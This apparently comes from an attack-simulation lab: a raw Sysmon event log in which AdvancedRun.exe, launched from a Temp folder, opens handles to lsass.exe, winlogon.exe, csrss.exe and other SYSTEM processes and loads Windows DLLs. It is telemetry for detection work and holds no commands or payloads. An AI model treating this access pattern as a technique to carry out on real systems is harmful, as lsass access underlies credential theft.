20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.192{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004077136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.190{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.174{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004077133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.164{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.158{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.157{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004077128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.154{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.154{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
